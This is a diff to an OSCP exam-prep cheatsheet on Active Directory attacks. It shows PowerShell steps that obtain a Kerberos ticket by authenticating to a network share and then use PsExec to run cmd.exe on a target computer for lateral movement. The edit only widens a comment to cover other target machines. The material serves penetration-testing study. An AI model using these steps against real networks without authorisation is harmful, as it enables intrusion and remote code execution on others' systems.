brianlam38/OSCP-2022/cheatsheet-active-directory.md

 # (new PS window, but on same host)
 PS> klist # should show no TGT/TGS
-PS> net use \\dc01                     # generate TGT by authN to network share on the DC PS> klist # now should show TGT/TGS
+PS> net use \\dc01 (try other comps/targets) # generate TGT by authN to network share on the computer PS> klist # now should show TGT/TGS
 PS> .\PsExec.exe \\[computer] cmd.exe  # use TGT to perform code exec against
                                        # target which user has permissions on.